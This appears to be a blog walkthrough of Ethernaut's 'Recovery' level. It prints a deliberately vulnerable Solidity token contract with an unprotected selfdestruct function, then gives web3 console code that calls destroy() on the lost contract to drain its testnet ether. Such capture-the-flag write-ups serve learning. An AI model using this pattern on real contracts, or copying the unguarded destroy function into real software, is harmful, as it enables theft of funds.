#17 — Ethernaut Challenge 17— Recovery

Objective:

• This level will be completed if you can recover (or remove) the 0.001 ether from the lost contract address.

Note: The solution mentioned in this blog post is majorly inspired from the solution by Web3 Blockchain Developer so that you can find the video format of this solution here on his channel.

Understanding the code:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Recovery {

  //generate tokens
  function generateToken(string memory _name, uint256 _initialSupply) public {
    new SimpleToken(_name, msg.sender, _initialSupply);
  
  }
}

contract SimpleToken {

  string public name;
  mapping (address => uint) public balances;

  // constructor
  constructor(string memory _name, address _creator, uint256 _initialSupply) {
    name = _name;
    balances[_creator] = _initialSupply;
  }

  // collect ether in return for tokens
  receive() external payable {
    balances[msg.sender] = msg.value * 10;
  }

  // allow transfers of tokens
  function transfer(address _to, uint _amount) public { 
    require(balances[msg.sender] >= _amount);
    balances[msg.sender] = balances[msg.sender] - _amount;
    balances[_to] = _amount;
  }

  // clean up after ourselves
  function destroy(address payable _to) public {
    selfdestruct(_to);
  }
}

There are two contracts in this — Recovery and SimpleToken.

The Recovery contract has a function called generateToken() which generates the tokens for this contract.

The SimpleToken contract can receive and transfer ether and destroy itself with the selfdestruct keyword.

How to hack this contract?

1. The missing contract address is of SimpleToken, but we can find it. First, open up the console and run await contract.address(). This will return the contract address of the Recovery contract.
2. Go to goerli.etherscan.io and paste the address you just copied into the search bar. This will give you a page that shows details of your Recovery contract’s address.
3. Under the Internal Txns section, in the column of the table listed as To and click contract creation. Click this link, and it will lead you to the missing contract address. Copy this.
4. Open up the console on Ethernaut again and run the following code:

data = web3.eth.abi.encodeFunctionCall({
 name:'destroy', 
 type:'function',
 inputs: [{
 type:'address',
 name:'_to'
 }]
}, [player]);

With this command, we are calling the destroy function on the SimpleToken contract and sending an argument with our address so that the funds transfer to the player, which is us.

5. Next, type in this code on the console:

await web3.eth.sendTransaction({
    to: "ADDRESS_LOST_CONTRACT",
    from: player,
    data: data
})

This code needs to be executed so that the transaction made in the previous code can get through as the data variable.

6. Once you press enter, you’ll have to sign the Metamask and well done, you can now submit the instance.

Congratulations on completing this level, more solutions to the remaining challenges will be coming up in my next blog posts, so make sure to follow and clap for more similar content!

Thanks for reading this far. I wish you all the best!